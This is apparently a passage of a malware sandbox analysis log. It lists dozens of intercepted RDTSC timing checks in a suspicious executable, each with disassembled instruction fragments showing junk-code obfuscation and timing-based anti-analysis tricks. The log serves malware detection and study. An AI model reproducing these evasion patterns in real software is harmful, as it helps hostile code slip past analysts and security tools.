Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC9338 second address: DC933C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCA411 second address: DCA41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC951E second address: DC95C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA790B33263h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+1245C685h], esi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d add di, A911h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 jmp 00007FA790B33265h 0x0000002e mov eax, dword ptr [ebp+122D0CA1h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FA790B33258h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e jp 00007FA790B3325Ch 0x00000054 mov dword ptr [ebp+1247114Fh], esi 0x0000005a add di, 6884h 0x0000005f push FFFFFFFFh 0x00000061 mov edi, dword ptr [ebp+122D3698h] 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FA790B33269h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC95C9 second address: DC95EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA7911D2C94h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC95EA second address: DC95F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC95F0 second address: DC95F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DC95F5 second address: DC95FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCB345 second address: DCB34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCB34B second address: DCB34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCB34F second address: DCB35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCB3E1 second address: DCB3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCB3E5 second address: DCB3EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCC628 second address: DCC62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DCC62C second address: DCC636 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DD0750 second address: DD076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B3325Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FA790B33256h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD10D second address: DDD117 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA7911D2C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD117 second address: DDD11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD11D second address: DDD121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD2E5 second address: DDD2F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA790B33262h 0x0000000c jo 00007FA790B33256h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD2F9 second address: DDD2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DDD2FD second address: DDD309 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA790B3325Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE3826 second address: DE382B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE39D3 second address: DE39D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE39D7 second address: DE3A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jp 00007FA7911D2C9Bh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jp 00007FA7911D2C97h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jl 00007FA7911D2C8Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE980D second address: DE982D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA790B33260h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FA790B33256h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE9C9E second address: DE9CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE9E0D second address: DE9E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DE9F88 second address: DE9F8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DEA212 second address: DEA22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B33266h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DEA22C second address: DEA232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DEA232 second address: DEA238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DEA238 second address: DEA23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DEA23C second address: DEA242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF2C13 second address: DF2C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF6A81 second address: DF6A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF6A85 second address: DF6AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Bh 0x00000007 jbe 00007FA7911D2C86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FA7911D2C9Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBB33A second address: DBB389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA790B33256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D330Dh], ecx 0x00000012 lea eax, dword ptr [ebp+1248103Eh] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FA790B33258h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D28DEh], esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d pop eax 0x0000003e jns 00007FA790B33256h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBB389 second address: D9C883 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA7911D2C8Ch 0x00000008 jno 00007FA7911D2C86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D3321h] 0x00000019 call dword ptr [ebp+122D1B44h] 0x0000001f pushad 0x00000020 jmp 00007FA7911D2C8Bh 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBB960 second address: DBB965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBB965 second address: DBB9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA7911D2C86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 1F7A93EAh 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FA7911D2C88h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 2438BD4Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBB9AA second address: DBB9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA790B33256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBBB85 second address: DBBB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FA7911D2C86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC147 second address: DBC19B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B3325Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FA790B33258h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D54A8h], edx 0x0000002b xor dword ptr [ebp+124458A6h], ebx 0x00000031 popad 0x00000032 push 0000001Eh 0x00000034 push ebx 0x00000035 adc edi, 68A554D6h 0x0000003b pop edi 0x0000003c push eax 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC19B second address: DBC1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC3AF second address: DBC3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007FA790B33267h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push esi 0x00000012 jg 00007FA790B33256h 0x00000018 pop esi 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jp 00007FA790B3325Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 js 00007FA790B33256h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC3F2 second address: DBC40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA7911D2C8Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC4CD second address: DBC4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B3325Ch 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d mov ecx, dword ptr [ebp+122D199Ch] 0x00000013 pop ecx 0x00000014 lea eax, dword ptr [ebp+12481082h] 0x0000001a and ecx, 0D162A00h 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jnc 00007FA790B33258h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC4FF second address: DBC525 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA7911D2C91h 0x00000008 jmp 00007FA7911D2C8Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA7911D2C8Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC525 second address: DBC52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC52B second address: DBC548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA7911D2C98h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC548 second address: DBC5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA790B33258h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 pushad 0x00000023 mov dword ptr [ebp+1245CC51h], edi 0x00000029 call 00007FA790B33260h 0x0000002e je 00007FA790B33256h 0x00000034 pop ecx 0x00000035 popad 0x00000036 lea eax, dword ptr [ebp+1248103Eh] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FA790B33258h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC5BF second address: DBC5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC5C3 second address: DBC5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC5C9 second address: DBC5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA7911D2C86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC5D3 second address: D9D42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ecx 0x00000011 nop 0x00000012 call 00007FA790B33267h 0x00000017 mov edx, 0FAFE4B5h 0x0000001c pop edx 0x0000001d call dword ptr [ebp+122D3105h] 0x00000023 jmp 00007FA790B3325Dh 0x00000028 jng 00007FA790B332ACh 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007FA790B33256h 0x00000036 jmp 00007FA790B33269h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF6D59 second address: DF6D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF6D5F second address: DF6D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA790B33267h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF6D7A second address: DF6DA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA7911D2C96h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF70DE second address: DF70E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF70E2 second address: DF70E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF7290 second address: DF7294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF7294 second address: DF729A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DF729A second address: DF72A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA790B33256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0026D second address: E0029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Ah 0x00000007 jnl 00007FA7911D2C86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FA7911D2C96h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E00713 second address: E00717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E00717 second address: E00726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA7911D2C8Eh 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DFFCB3 second address: DFFCB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DFFCB7 second address: DFFCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E04247 second address: E04254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA790B33256h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E04254 second address: E0426D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA7911D2C86h 0x0000000a jmp 00007FA7911D2C8Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E04562 second address: E045A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FA790B33256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA790B3325Ch 0x00000012 jmp 00007FA790B33260h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA790B33269h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D468 second address: E0D46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D46C second address: E0D47D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA790B33256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D47D second address: E0D483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D483 second address: E0D488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D488 second address: E0D48E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D8F5 second address: E0D8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0D8F9 second address: E0D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA7911D2C86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0DA74 second address: E0DAB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33265h 0x00000007 jno 00007FA790B33256h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007FA790B33265h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0DAB1 second address: E0DAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DBC006 second address: DBC00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: E0DBC7 second address: E0DBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
